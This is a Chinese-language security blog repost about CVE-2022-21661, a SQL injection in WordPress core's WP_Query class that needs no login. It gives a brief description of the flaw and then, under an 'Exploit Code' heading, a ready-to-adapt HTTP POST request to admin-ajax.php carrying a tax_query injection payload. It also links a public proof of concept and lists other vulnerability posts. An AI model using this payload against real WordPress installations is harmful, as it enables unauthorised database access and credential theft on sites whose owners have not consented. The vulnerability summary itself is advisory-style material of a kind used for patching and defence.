CVE-2022-21661 - WordPress 核心 5.8.2 -WP_QuerySQL 注入

admin

101411
文章

87
评论

2023年1月7日16:20:28评论70 views字数 869阅读2分53秒阅读模式

此漏洞允许远程攻击者泄露有关受影响的 WordPress 核心安装的敏感信息，不需要身份验证即可利用此漏洞，具体缺陷存在于 WP_Query 类中。

该问题是由于在使用用户提供的字符串构建 SQL 查询之前未对其进行适当验证造成的，攻击者可以利用此漏洞泄露存储的凭据，从而导致进一步的危害。

受影响的版本版本：< 5.8.3

CVE-2022-21661 - WordPress 核心 5.8.2 -WP_QuerySQL 注入

# [ Exploit Code ] :
POST /wp-admin/admin-ajax.php HTTP/1.1Host: localhostUpgrade-Insecure_Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.99Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: cross-siteSec-Fetch-User: ?1Cache-Control: max-age=0Connection: close Content-Type: application/x-www-form-urlencoded
action=<action_name>&nonce=a85a0c3bfa&query_vars={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["<inject>"]}}}

参考：https://github.com/APTIRAN/CVE-2022-21661

原文始发于微信公众号（Ots安全）：CVE-2022-21661 – WordPress 核心 5.8.2 –“WP_Query”SQL 注入

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2022-21661 - WordPress 核心 5.8.2 -WP_QuerySQL 注入

WIFISKY-7层流控路由器confirm.php RCE 附poc

润乾报表dataSphereServlet 任意文件上传

Geoserver漏洞复现

魔方网表存在文件上传漏洞

DataCube3 getting_index_data.php SQL注入漏洞

用友NC Cloud importhttpscer接口存在任意文件上传漏洞

GL.iNet 路由器身份验证绕过漏洞 (CVE-2023-46453)

【漏洞预警】SEMCMS安全漏洞(CVE-2024-30938)

1day分享｜ Geoserver命令执行漏洞

漏洞预警 JEECMS o_upload 文件上传漏洞

发表评论

在线咨询

微信